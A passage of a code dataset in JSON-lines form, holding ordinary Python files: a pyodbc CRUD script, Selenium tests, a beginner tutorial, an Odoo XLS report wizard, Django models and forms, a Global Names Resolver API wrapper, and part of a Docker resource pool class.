Select(conexion)\n \ndef Delete(CONEXION):\n print(\"borrando\")\n cur=CONEXION.cursor()\n cur.execute(\"delete from dimusers where accountid = 1007\") \n cur.commit()\n Select(CONEXION) \n \ncn = pyodbc.connect(\n \"Driver={SQL Server Native Client 11.0};\"\n \"Server=.;\"\n \"Database=DataMart__Security;\"\n \"Trusted_Connection=Yes;\" \n )\n\nif cn:\n print(\"conecto!\")\n \n \nSelect2(cn)\n#Insert(cn)\n#Update(cn)\n#Delete(cn)\n\ncn.close()","sub_path":"consql.py","file_name":"consql.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610874443","text":"import unittest\nimport os\nfrom selenium import webdriver\n\n\nclass TestOpenDashboard(unittest.TestCase):\n URL = 'http://localhost:5000/'\n\n def setUp(self):\n driver = '/usr/local/bin/chromedriver'\n os.environ['webdriver.chrome.driver'] = driver\n self.browser = webdriver.Chrome(driver)\n self.urlname = 'GDG-BH'\n\n def tearDown(self):\n self.browser.close()\n\n def test_should_loads_page(self):\n self.browser.get(self.URL)\n title = self.browser.title\n assert 'Community Dashboard' in title\n\n def test_should_loads_group_name_as_url_on_dashboard(self):\n self.browser.get(self.URL)\n urlname_field = self.browser.find_element_by_id('urlname')\n urlname_field.send_keys(self.urlname)\n\n go_button = self.browser.find_element_by_id('go')\n go_button.click()\n assert 'http://localhost:5000/dashboard/?urlname=' + self.urlname in self.browser.current_url\n\n def test_should_loads_groupname_on_dashboard(self):\n self.browser.get(self.URL)\n urlname_field = self.browser.find_element_by_id('urlname')\n urlname_field.send_keys(self.urlname)\n\n go_button = self.browser.find_element_by_id('go')\n go_button.click()\n\n community_name = self.browser.find_element_by_id('community-name')\n assert self.urlname in community_name.text\n\n def test_should_return_page_not_found_when_try_access_nonexistent_page(self):\n self.browser.get(self.URL + 'nonexistent')\n page_not_found = self.browser.find_element_by_tag_name('h1')\n assert 'Page Not Found' in page_not_found.text\n\nif __name__ == '__main__':\n 
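consql.py above pastes literal values directly into its SQL strings. pyodbc supports ? placeholders, which avoids quoting bugs and SQL injection; a hedged sketch against the same dimusers table, reusing the connection cn built above:

def update_account(cn, account_id, new_account):
    cur = cn.cursor()
    # Values are bound as parameters instead of being inlined into the SQL.
    cur.execute(
        "update dimusers set account = ? where accountid = ?",
        (new_account, account_id),
    )
    cn.commit()

update_account(cn, 1007, 'BTO\\Anibal')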
unittest.main(verbosity=1)\n","sub_path":"tests/functional/test_dashboard.py","file_name":"test_dashboard.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"463966443","text":"import time\n\ndef function():\n print(\"To make a function, use use 'def' to begin to define the function\")\n\nstring = \"this is a string\"\nthisIsAnInteger = 7\nthisIsABoolean = True\nthisIsAList = [5, 6, 7, 8]\nthisIsADictionary = {\"key\":\"value\" , \"five\":5}\n\nfunction()\nprint(\"This shows the value associated with the key in the dictionary: \" + thisIsADictionary[\"key\"])\nprint(\"This shows the value in the 2 spot of the list: \", thisIsAList[2])\n\nclass person():\n\n def __init__(self, height, weight, gender, ethnicity):\n self.height = height\n self.weight = weight\n personGender = gender\n personEthnicity = ethnicity\n print(\"Person: I am \" + personEthnicity + \"!\")\n\n def personSpeak(self):\n print(\"Mia: I weigh \" + self.weight + \"!\")\n\nMia = person(\"4'11\",\"108 lbs\", \"female\", \"Mixed\")\n\nprint(\"This is Mia's height: \" + Mia.height)\nprint(\"This is Mia's weight: \" + Mia.weight)\nMia.personSpeak()\n\nplayer = person(input(\"What's your height?: \"),input(\"What's your weight?: \"),input(\"What's your gender?: \"),input(\"What's your ethnicity?: \"))\n\nprint(\"This will not work because you can't access this varable without the 'self' at the beginning.\")\nprint(Mia.personGender)","sub_path":"Hello_Darkness.py","file_name":"Hello_Darkness.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158755567","text":"# coding: utf-8\nfrom odoo import api, fields, models\nfrom odoo.exceptions import ValidationError\nimport xlwt\nfrom io import BytesIO\nimport base64\nfrom datetime import datetime\n\nclass BimResourceReportWizard(models.TransientModel):\n _name = 'bim.resource.report.wizard'\n _description = 'Reporte de Recursos del Presupuesto'\n\n def _default_budget(self):\n return self.env['bim.budget'].browse(self._context.get('active_id'))\n\n\n material = fields.Boolean(string=\"Materiales\",default=True)\n equipment = fields.Boolean(string=\"Equipos\",default=True)\n labor = fields.Boolean(string=\"Mano de Obra\",default=True)\n aux = fields.Boolean(string=\"Otros\",default=True)\n budget_id = fields.Many2one('bim.budget', \"Presupuesto\", required=True, default=_default_budget)\n resource_all = fields.Boolean(default=True,string=\"TODOS\")\n filter_categ = fields.Boolean(string=\"Filtro Categoría\")\n category_id = fields.Many2one('product.category', \"Categoría\")\n\n def recursive_amount(self, resource, parent, amount=None):\n amount = amount is None and resource.balance or amount\n if parent.type == 'departure':\n amount_partial = amount * parent.quantity\n return self.recursive_amount(resource,parent.parent_id,amount_partial)\n else:\n return amount * parent.quantity\n\n def recursive_quantity(self, resource, parent, qty=None):\n qty = qty is None and resource.quantity or qty\n if parent.type == 'departure':\n qty_partial = qty * parent.quantity\n return self.recursive_quantity(resource,parent.parent_id,qty_partial)\n else:\n return qty * parent.quantity\n\n @api.model\n def get_total_aux(self,resource):\n total = 0\n if resource.balance > 0:\n total += self.recursive_amount(resource,resource.parent_id,None)\n return total\n\n @api.model\n def get_total(self,resource_id):\n budget = 
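The functional tests in test_dashboard.py above locate elements immediately after click(), which can race a slow dev server. A hedged sketch using Selenium's explicit waits, with the same element IDs the tests use:

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def open_dashboard(browser, url, urlname, timeout=10):
    browser.get(url)
    wait = WebDriverWait(browser, timeout)
    # Wait for the form instead of assuming the page has already rendered.
    wait.until(EC.presence_of_element_located((By.ID, 'urlname'))).send_keys(urlname)
    browser.find_element_by_id('go').click()
    # Block until the dashboard shows the community name, then return it.
    return wait.until(EC.visibility_of_element_located((By.ID, 'community-name'))).text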
self.budget_id\n records = budget.concept_ids.filtered(lambda c: c.product_id.id == resource_id)\n total = 0\n\n for rec in records:\n if rec.balance > 0:\n total += self.recursive_amount(rec,rec.parent_id,None)\n return total\n\n @api.model\n def get_quantity_aux(self,resource):\n total_qty = 0\n if resource.quantity > 0:\n total_qty += self.recursive_quantity(resource,resource.parent_id,None)\n return total_qty\n\n @api.model\n def get_quantity(self,resource_id):\n budget = self.budget_id\n records = budget.concept_ids.filtered(lambda c: c.product_id.id == resource_id)\n total_qty = 0\n for rec in records:\n if rec.quantity > 0:\n total_qty += self.recursive_quantity(rec,rec.parent_id,None)\n return total_qty\n\n @api.model\n def get_weight(self,resource_id):\n budget = self.budget_id\n records = budget.concept_ids.filtered(lambda c: c.product_id.id == resource_id)\n total_weight = 0\n for rec in records:\n total_weight += rec.weight\n return total_weight\n\n @api.model\n def get_function(self,aux):\n values = self.budget_id.concept_ids\n resources = False\n if aux:\n resources = values.filtered(lambda c: c.type == 'aux')\n return resources\n\n @api.model\n def get_resources(self,material,labor,equipment):\n values = self.budget_id.concept_ids\n domain = []\n if material:\n domain.append('material')\n if equipment:\n domain.append('equip')\n if labor:\n domain.append('labor')\n resources = values.filtered(lambda c: c.type in domain).mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n return resources\n\n @api.model\n def get_resources_total(self,material,labor,equipment,aux):\n values = self.budget_id.concept_ids\n result = []\n if material:\n total_material = 0\n resources = values.filtered(lambda c: c.type in 'material').mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n for mat in resources:\n total_material += self.get_total(mat.id)\n result.append({'name':'Total Materiales','amount': total_material})\n\n if equipment:\n total_equip = 0\n resources = values.filtered(lambda c: c.type in 'equip').mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n for eqp in resources:\n total_equip += self.get_total(eqp.id)\n result.append({'name':'Total Equipos','amount': total_equip})\n\n if labor:\n total_labor = 0\n resources = values.filtered(lambda c: c.type in 'labor').mapped('product_id')\n if self.filter_categ:\n resources = resources.filtered(lambda p: p.categ_id.id == self.category_id.id)\n for lab in resources:\n total_labor += self.get_total(lab.id)\n result.append({'name':'Total Mano de Obra','amount': total_labor})\n\n if aux:\n total_aux = self.budget_id.amount_total_other\n result.append({'name':'Total Otros','amount': total_aux})\n\n return result\n\n\n @api.onchange('equipment', 'material', 'labor','aux')\n def onchange_resource(self):\n self.resource_all = True if (self.equipment and self.material and self.labor and self.aux) else False\n\n @api.onchange('resource_all')\n def onchange_resource_all(self):\n if not self.resource_all and (self.equipment and self.material and self.labor and self.aux):\n self.equipment = self.material = self.labor = self.aux = False\n elif self.resource_all:\n self.equipment = self.material = self.labor = self.aux = True\n\n def print_report(self):\n return self.env.ref('base_bim_2.bim_budget_resource').report_action(self)\n\n 
def get_resource_type(self,res_type):\n result = ''\n if res_type == 'aux':\n result = 'FUNCION / ADMINISTRATIVO'\n elif res_type == 'H':\n result = 'MANO DE OBRA'\n elif res_type == 'M':\n result = 'MATERIAL'\n elif res_type == 'Q':\n result = 'EQUIPO'\n return result\n\n\n def check_report_xls(self):\n budget = self.budget_id\n workbook = xlwt.Workbook(encoding=\"utf-8\")\n worksheet = workbook.add_sheet('Recursos')\n file_name = 'Recursos'\n style_title = xlwt.easyxf('font: name Times New Roman 180, color-index black, bold on; align: wrap yes, horiz left')\n style_border_table_top = xlwt.easyxf('borders: left thin, right thin, top thin, bottom thin; font: bold on;')\n style_border_table_details = xlwt.easyxf('borders: bottom thin;')\n worksheet.write_merge(0, 0, 0, 4, \"LISTADO DE RECURSOS\", style_title)\n worksheet.write_merge(1,1,0,2, \"Obra\")\n worksheet.write_merge(1,1,3,5, budget.name)\n worksheet.write_merge(1,1,6,8, \"Fecha de Impresión\")\n worksheet.write_merge(2,2,0,2, budget.project_id.nombre)\n worksheet.write_merge(2,2,3,5, budget.code)\n worksheet.write_merge(2,2,6,8, datetime.now().strftime('%d-%m-%Y'))\n\n # Header table\n worksheet.write_merge(4,4,0,0, \"Código\", style_border_table_top)\n worksheet.write_merge(4,4,1,5, \"Recurso\", style_border_table_top)\n worksheet.write_merge(4,4,6,6, \"Tipo\", style_border_table_top)\n worksheet.write_merge(4,4,7,7, \"Unidad\", style_border_table_top)\n worksheet.write_merge(4,4,8,8, \"Cantidad\", style_border_table_top)\n worksheet.write_merge(4,4,9,9, \"Peso\", style_border_table_top)\n worksheet.write_merge(4,4,10,10, \"Costo\", style_border_table_top)\n resources = self.get_resources(self.material,self.labor,self.equipment)\n functions = self.get_function(self.aux)\n row = 5\n for res in resources:\n weight = round(self.get_weight(res.id),2)\n worksheet.write_merge(row,row,0,0, res.code, style_border_table_details)\n worksheet.write_merge(row,row,1,5, res.name, style_border_table_details)\n worksheet.write_merge(row,row,6,6, self.get_resource_type(res.resource_type), style_border_table_details)\n worksheet.write_merge(row,row,7,7, res.uom_id.name, style_border_table_details)\n worksheet.write_merge(row,row,8,8, round(self.get_quantity(res.id),3), style_border_table_details)\n if weight <= 0:\n worksheet.write_merge(row,row,9,9, \"-\", style_border_table_details)\n else:\n worksheet.write_merge(row,row,9,9, weight, style_border_table_details)\n worksheet.write_merge(row,row,10,10, round(self.get_total(res.id),2), style_border_table_details)\n row += 1\n if functions:\n for res in functions:\n worksheet.write_merge(row,row,0,0, res.code, style_border_table_details)\n worksheet.write_merge(row,row,1,5, res.name, style_border_table_details)\n worksheet.write_merge(row,row,6,6, self.get_resource_type(res.type), style_border_table_details)\n worksheet.write_merge(row,row,7,7, res.uom_id.name, style_border_table_details)\n worksheet.write_merge(row,row,8,8, res.amount_compute, style_border_table_details)#round(self.get_quantity_aux(res),3)\n worksheet.write_merge(row,row,9,9, \"-\", style_border_table_details)\n worksheet.write_merge(row,row,10,10, round(self.get_total_aux(res),2), style_border_table_details)\n row += 1\n\n totals = self.get_resources_total(self.material,self.labor,self.equipment,self.aux)\n for tot in totals:\n worksheet.write_merge(row,row,7,8, tot['name'], style_border_table_details)\n worksheet.write_merge(row,row,9,10, tot['amount'], style_border_table_details)\n row += 1\n\n fp = BytesIO()\n 
workbook.save(fp)\n fp.seek(0)\n data = fp.read()\n fp.close()\n data_b64 = base64.encodestring(data)\n doc = self.env['ir.attachment'].create({\n 'name': '%s.xls' % (file_name),\n 'datas': data_b64,\n })\n\n return {\n 'type': \"ir.actions.act_url\",\n 'url': \"web/content/?model=ir.attachment&id=\" + str(\n doc.id) + \"&filename_field=name&field=datas&download=true&filename=\" + str(doc.name),\n 'target': \"self\",\n 'no_destroy': False,\n }\n","sub_path":"base_bim_2/wizard/bim_resource_report.py","file_name":"bim_resource_report.py","file_ext":"py","file_size_in_byte":10770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"588946264","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\n\n# Create your models here.\nfrom django.db.models import Sum\n\nfrom danibraz.checkout.validate_error_invoice import validate_quantity\n\nOPERACAO_CHOICES = (\n ('C', 'COMPRA'),\n ('V', 'VENDA'),\n ('D', 'DIVIDENDOS'),\n ('S', 'SPLIT')\n)\n\n\nPAPEL_CHOICES = (\n ('ABEV3', 'AMBEV S/A'),\n ('BBAS3', 'BRASIL'),\n ('BBDC3', 'BRADESCO 3'),\n ('BBDC4', 'BRADESCO 4'),\n ('BBSE3', 'BBSEGURIDADE'),\n ('BRAP4', 'BRADESPAR'),\n ('BRFS3', 'BRF SA'),\n ('BRKM5', 'BRASKEM'),\n ('BRML3', 'BR MALLS PAR'),\n ('BVMF3', 'BMFBOVESPA'),\n ('CCRO3', 'CCR SA'),\n ('CIEL3', 'CIELO'),\n ('CMIG4', 'CEMIG'),\n ('CSAN3', 'COSAN'),\n ('CSNA3', 'SID NACIONAL'),\n ('ECOR3', 'ECORODOVIAS'),\n ('ELET3', 'ELETROBRAS'),\n ('EMBR3', 'EMBRAER'),\n ('EQTL3', 'EQUATORIAL'),\n ('ESTC3', 'ESTACIO PART'),\n ('FIBR3', 'FIBRIA'),\n ('GGBR4', 'GERDAU'),\n ('GOAU4', 'GERDAU MET'),\n ('HYPE3', 'HYPERMARCAS'),\n ('ITSA4', 'ITAUSA'),\n ('ITUB4', 'ITAUUNIBANCO'),\n ('JBSS3', 'JBS'),\n ('KLBN11', 'KLABIN S/A'),\n ('KROT3', 'KROTON'),\n ('LAME4', 'LOJAS AMERIC'),\n ('LREN3', 'LOJAS RENNER'),\n ('MRVE3', 'MRV'),\n ('MULT3', 'MULTIPLAN'),\n ('NATU3', 'NATURA'),\n ('PCAR4', 'P.ACUCAR-CBD'),\n ('PETR3', 'PETROBRAS'),\n ('PETR4', 'PETROBRAS'),\n ('QUAL3', 'QUALICORP'),\n ('RADL3', 'RAIADROGASIL'),\n ('RAIL3', 'RUMO S.A.'),\n ('RENT3', 'LOCALIZA'),\n ('SANB11', 'SANTANDER BR'),\n ('SBSP3', 'SABESP'),\n ('SUZB5', 'SUZANO PAPEL'),\n ('TAEE11', 'TAESA'),\n ('UGPA3', 'ULTRAPAR'),\n ('USIM5', 'USIMINAS'),\n ('VALE3', 'VALE'),\n ('VIVT4', 'TELEF BRASIL'),\n ('WEGE3', 'WEG')\n)\n\n\nclass Lancamento(models.Model):\n data = models.DateField('Data')\n # papel = models.CharField('Papel',max_length=100, choices=PAPEL_CHOICES)\n # operacao = models.CharField('Operação',max_length=100, choices=OPERACAO_CHOICES)\n # quantidade = models.PositiveIntegerField('Quantidade', default=1)\n\n class Meta:\n verbose_name_plural = 'lançamentos'\n verbose_name = 'lançamento'\n\n def __str__(self):\n return str(self.data)\n\n def get_absolute_url(self):\n from django.urls import reverse\n return reverse('checkout:lancamento_editar', args=[str(self.id)])\n\n\nclass LancamentoItem(models.Model):\n lancamento = models.ForeignKey('checkout.Lancamento', related_name='lancamento_item')\n symbol = models.CharField('Papel',max_length=100, choices=PAPEL_CHOICES)\n quantity = models.PositiveIntegerField('Quantidade', default=1)\n price = models.DecimalField('Preço', decimal_places=2, max_digits=8)\n\n class Meta:\n verbose_name = 'Item do Lançamento'\n verbose_name_plural = 'Itens do Lancamento'\n\n def __str__(self):\n return '{} [{}]'.format(self.lancamento, 
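recursive_quantity() and recursive_amount() in bim_resource_report.py above multiply a resource's figure by the quantity of every 'departure' ancestor up to the first non-departure node. A standalone sketch of that roll-up on a plain parent chain; Node is a stand-in for the bim concept records, and the sample tree is an assumption:

from dataclasses import dataclass
from typing import Optional

@dataclass
class Node:
    type: str                       # 'departure', 'chapter', ...
    quantity: float
    parent: Optional['Node'] = None

def rolled_up(value: float, parent: Node) -> float:
    while parent.type == 'departure':
        value *= parent.quantity    # scale by each intermediate departure
        parent = parent.parent
    return value * parent.quantity  # first non-departure ancestor closes the chain

chapter = Node('chapter', 1.0)
departure = Node('departure', 3.0, chapter)
print(rolled_up(2.0, departure))    # 2 * 3 * 1 = 6.0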
self.quantity)\n\n\n#----------------------------------------------------------------------------------\nclass Papel(models.Model):\n symbol = models.CharField('Papel', max_length=100, choices=PAPEL_CHOICES)\n stock = models.PositiveSmallIntegerField('Estoque')\n created = models.DateTimeField('created', auto_now_add=True)\n modified = models.DateTimeField('modified', auto_now=True)\n\n class Meta:\n verbose_name = 'Papel'\n verbose_name_plural = 'Papeis'\n\n def __str__(self):\n return self.symbol\n\n\nclass Invoice(models.Model):\n customer = models.ForeignKey('persons.Client')\n emissao = models.DateField('emissao')\n total = models.IntegerField('Total')\n created = models.DateTimeField('created', auto_now_add=True)\n modified = models.DateTimeField('modified', auto_now=True)\n\n def get_absolute_url(self):\n return reverse('checkout:invoice_edit', args=(self.pk,))\n\n # def get_absolute_url(self):\n # return reverse('persons:clients_editar', args=[str(self.id)])\n\n @property\n def total_prop(self):\n return self.nota.all().aggregate(Sum('unit_price'))['unit_price__sum'] #+ self.custo_bovespa.all().aggregate(Sum('emolumentos'))['emolumentos__sum']\n\n\n\n\nclass Item(models.Model):\n invoice = models.ForeignKey(Invoice, related_name='nota')\n title = models.ForeignKey('checkout.Papel')\n quantity = models.PositiveSmallIntegerField('quantity', validators=[validate_quantity])\n unit_price = models.DecimalField('unit price', max_digits=10, decimal_places=2)\n created = models.DateTimeField('created', auto_now_add=True)\n modified = models.DateTimeField('modified', auto_now=True)\n\n class Meta:\n verbose_name = 'Item da Nota'\n verbose_name_plural = 'Itens da Nota'\n #unique_together = (('invoice', 'title'),)\n\ndef post_save_item(sender, instance, **kwargs):\n if instance.title.stock >= instance.quantity:\n instance.title.stock -= instance.quantity\n instance.title.save()\n else:\n # instance.title.stock = 0\n # instance.title.save()\n #raise ValidationError('O valor do estoque ficará negativo, Não foi salvo')\n errors_message = 'A nota não foi salva.'\n\n\nmodels.signals.post_save.connect(\n post_save_item, sender=Item, dispatch_uid='post_save_item'\n)","sub_path":"danibraz/checkout/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"637620280","text":"#-*- coding: utf-8 -*-\n\nfrom django import forms\nfrom .models import Person\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass PersonForm(forms.ModelForm):\n class Meta:\n model = Person\n exclude = ['slug']\n labels = {\n 'name': _(u'Imię'),\n 'surname': _(u'Nazwisko'),\n 'birthday': _(u'Data urodzenia'),\n 'nationality': _(u'Narodowość'),\n 'type': _(u'Rodzaj'),\n 'position': _(u'Pozycja'),\n 'team': _(u'Zespół'),\n 'photo': _(u'Zdjęcie')\n }\n","sub_path":"person/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"468504117","text":"\"\"\"\nWrappers for GNR API calls and derived functions.\n\nAPI documentation can be found at: http://resolver.globalnames.org/api\n\"\"\"\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nimport requests\n\nfrom bdcctools.taxonomic.utils import expand_result\n\nAPI_URL = \"http://resolver.globalnames.org/name_resolvers.json\"\n\n\ndef resolve(\n names: Union[list, pd.Series, str],\n data_source_ids: list = None,\n 
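The post_save_item hook in checkout/models.py above decrements Papel.stock in Python, which can race under concurrent saves and silently skips when stock is short. A hedged sketch of an atomic, guarded decrement with an F() expression, assuming the Papel model defined above:

from django.db.models import F

def reserve_stock(papel_id, quantity):
    """Atomically decrement stock; returns False if not enough was left."""
    updated = Papel.objects.filter(
        pk=papel_id,
        stock__gte=quantity,        # guard evaluated inside the same UPDATE
    ).update(stock=F('stock') - quantity)
    return updated == 1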
resolve_once: bool = False,\n best_match_only: bool = False,\n with_context: bool = False,\n with_vernaculars: bool = False,\n with_canonical_ranks: bool = False\n) -> pd.DataFrame:\n \"\"\"\n Receives a list of names and resolves each against the entire resolver\n database or against specific data sources using the Global Names\n Resolver (GNR) API. Underlying resolving and scoring algorithms are\n described at: http://resolver.globalnames.org/about\n\n Parameters\n ----------\n names: List of species names to resolve.\n data_source_ids: List of specific data sources IDs to resolve\n against. A list of all the available data\n sources and their IDs can be found at:\n http://resolver.globalnames.org/data_sources.\n resolve_once: Find the first available match instead of\n matches across all data sources with all\n possible renderings of a name.\n best_match_only: Returns just one result with the highest\n score.\n with_context: Reduce the likelihood of matches to taxonomic\n homonyms. When True, a common taxonomic\n context is calculated for all supplied names\n from matches in data sources that have\n classification tree paths. Names out of\n determined context are penalized during\n score calculation.\n with_vernaculars: Return 'vernacular' field to present common\n names provided by a data source for a\n particular match.\n with_canonical_ranks: Returns 'canonical_form' with infraspecific\n ranks, if they are present.\n\n Returns\n -------\n List with the results for each name in names.\n\n Notes\n -----\n More information on the GNR API can be found at:\n http://resolver.globalnames.org/api\n \"\"\"\n if isinstance(names, str):\n names = [names]\n if data_source_ids is None:\n data_source_ids = []\n\n # Apparently, GNR API does not accept Booleans so they need to be\n # converted to lowercase strings first.\n params = {\n \"data\": \"\\n\".join(names),\n \"data_source_ids\": \"|\".join(data_source_ids),\n \"resolve_once\": str(resolve_once).lower(),\n \"best_match_only\": str(best_match_only).lower(),\n \"with_context\": str(with_context).lower(),\n \"with_vernaculars\": str(with_vernaculars).lower(),\n \"with_canonical_ranks\": str(with_canonical_ranks).lower()\n }\n\n try:\n response = requests.post(API_URL, json=params)\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n raise Exception(f\"Error calling Global Name Resolver API. {err}\")\n\n data = response.json()[\"data\"]\n\n return pd.json_normalize(data, record_path=\"results\", meta=\"supplied_name_string\")\n\n\ndef get_classification(\n names: Union[list, pd.Series, str],\n add_supplied_names: bool = False,\n add_source: bool = False,\n expand: bool = True,\n **kwargs,\n) -> pd.DataFrame:\n \"\"\"\n Gets the complete classification of multiple scientific names using\n the Global Names Resolver.\n\n Parameters\n ----------\n names: Scientific name(s) to get results for.\n add_supplied_names: Add supplied scientific names column to the\n resulting DataFrame.\n add_source: Add source column to the resulting DataFrame.\n expand: Whether to expand result rows to match `names`\n size. If False, the number of rows will correspond\n to the number of unique names in `names`. 
Only\n has effect if best_match_only=True is passed.\n kwargs: Keyword arguments of the resolve function.\n\n Returns\n -------\n Classification DataFrame.\n \"\"\"\n if isinstance(names, (list, str)):\n names = pd.Series(names)\n\n unique_names = pd.Series(names.dropna().unique())\n result = resolve(unique_names, **kwargs)\n\n ranks = [\"kingdom\", \"phylum\", \"class\", \"order\", \"family\", \"genus\", \"species\"]\n df = pd.DataFrame(columns=ranks, index=result.index)\n rank_indices = result[\"classification_path_ranks\"].str.split(\"|\", expand=True)\n path_indices = result[\"classification_path\"].str.split(\"|\", expand=True)\n\n for rank in ranks:\n mask = (rank_indices == rank).any(axis=1)\n rank_idx = np.nonzero(rank_indices[mask].values == rank)\n rank_paths = path_indices[mask].values[rank_idx]\n df.loc[mask, rank] = rank_paths\n\n if add_supplied_names:\n df[\"supplied_name\"] = unique_names\n if add_source:\n df[\"source\"] = result[\"data_source_title\"]\n if kwargs.get(\"best_match_only\"):\n if expand:\n df = expand_result(df, names)\n\n return df\n","sub_path":"bdcctools/taxonomic/web/gnr.py","file_name":"gnr.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351636859","text":"# 区分以下类型哪些是容器序列哪些是扁平序列,哪些是可变序列哪些是不可变序列:\n\n# list - 容器序列, 可变序列\nlist_a = [1, 'a']\nlist_b = list_a\nprint(list_b is list_a) # True\nlist_a[1] = 'b'\nprint(list_b is list_a) # True\n\n# tuple - 容器序列, 不可变序列\ntuple_a = tuple([1, 'a'])\ntry:\n tuple_a[1] = 'b' # TypeError\nexcept TypeError:\n print('tuple object does not support item assignment')\n\n# str - 扁平序列, 不可变序列\nstr_a = 'abcdef'\ntry:\n str_a[0] = 1 # TypeError\nexcept TypeError:\n print('str object does not support item assignment')\n\n# dict - 容器, 可变\ndict_a = { 'a': 10, 'b': 'str'}\ndict_b = dict_a\nprint(dict_b is dict_a) # True\ndict_a['b'] = 12\nprint(dict_b is dict_a) # True\n\n# collections.deque - 容器序列, 可变序列\nfrom collections import deque\ndeque_a = deque([1, 'a'])\ndeque_b = deque_a\nprint(deque_b is deque_a) # True\ndeque_a[1] = 'b'\nprint(deque_b is deque_a) # True","sub_path":"week08/01_exercise.py","file_name":"01_exercise.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"215405292","text":"# vim: set sw=4 ts=4 softtabstop=4 expandtab:\nfrom . BackendBase import *\nimport functools\nimport logging\nimport os\nimport pprint\nimport time\nimport psutil\nimport threading\nimport traceback\nimport requests.exceptions\nimport json\n_logger = logging.getLogger(__name__)\n\n\nclass DockerBackendException(BackendException):\n pass\n\ntry:\n import docker\nexcept ImportError:\n raise DockerBackendException(\n 'Could not import docker module from docker-py')\n\n# Pool of resources.\n# FIXME: We need a way to close all the clients when all runners\n# finish.\nclass ResourcePool:\n \"\"\"\n Resource pool for DockerBackend. It contains a set of resources\n that can be acquired and returned. 
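A hedged usage sketch for the resolve()/get_classification() helpers above; the species names are examples, and the selected columns assume the usual fields of the GNR results payload (name_string, score) plus the meta and rank columns these functions build:

import pandas as pd

names = pd.Series(['Panthera onca', 'Tremarctos ornatus'])

# One best match per name, against all data sources:
matches = resolve(names, best_match_only=True)
print(matches[['supplied_name_string', 'name_string', 'score']])

# Full Linnaean ranks, one row per input row:
ranks = get_classification(names, best_match_only=True, add_supplied_names=True)
print(ranks[['supplied_name', 'kingdom', 'family', 'species']])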
These resources include\n\n * DockerClient\n * CPUs\n \"\"\"\n def __init__(self, num_jobs, available_cpu_ids, cpus_per_job, use_memset_of_nearest_node):\n assert isinstance(num_jobs, int)\n assert num_jobs > 0\n assert isinstance(available_cpu_ids, set) or available_cpu_ids is None\n assert isinstance(cpus_per_job, int) or cpus_per_job is None\n if cpus_per_job is not None:\n assert cpus_per_job > 0\n if available_cpu_ids is not None:\n assert len(available_cpu_ids) > 0\n assert isinstance(use_memset_of_nearest_node, bool) or use_memset_of_nearest_node is None\n self._num_jobs = num_jobs\n self._available_cpu_ids = available_cpu_ids\n self._cpus_per_job = cpus_per_job\n self._use_memset_of_nearest_node = use_memset_of_nearest_node\n\n # Docker client data structures\n self._docker_clients = dict() # All created clients\n self._docker_client_pool = set() # Available clients\n\n # CPU and memset data structures\n self._numa_nodes = dict() # Maps NUMA node to set of CPU ids\n self._numa_node_pool = dict() # Maps NUMa node to set of available CPU ids\n\n self._lock = threading.Lock()\n\n # Sanity check\n if cpus_per_job is not None and available_cpu_ids is not None:\n assert (num_jobs * cpus_per_job) <= len(available_cpu_ids)\n\n def _lazy_docker_client_init(self):\n # Implicitly assume lock is already held\n if len(self._docker_clients) != 0:\n # Init already happenend\n return\n # Create Docker clients\n for index in range(0, self._num_jobs):\n _logger.info('Creating DockerClient {}'.format(index))\n new_client = docker.APIClient(version='1.24')\n self._docker_clients[id(new_client)] = new_client\n # Add to pool\n self._docker_client_pool.add(id(new_client))\n\n assert len(self._docker_clients) == len(self._docker_client_pool)\n\n def get_docker_client(self):\n with self._lock:\n self._lazy_docker_client_init()\n try:\n docker_client_id = self._docker_client_pool.pop()\n except Exception as e:\n _logger.error('Failed to get client from pool')\n _logger.error(e)\n raise e\n return self._docker_clients[docker_client_id]\n\n def release_docker_client(self, docker_client):\n with self._lock:\n self._lazy_docker_client_init()\n if id(docker_client) not in self._docker_clients:\n raise DockerBackendException('Invalid client released back to pool')\n if id(docker_client) in self._docker_client_pool:\n raise DockerBackendException('Returned client is already in pool')\n # Put back in pool\n self._docker_client_pool.add(id(docker_client))\n\n def _lazy_cpu_and_mem_set_init(self):\n # Implicitly assume lock is already held\n if len(self._numa_nodes) != 0:\n # Init already happened\n return\n if (self._available_cpu_ids is None\n or self._cpus_per_job is None\n or self._use_memset_of_nearest_node is None):\n raise Exception('Cannot do init. 
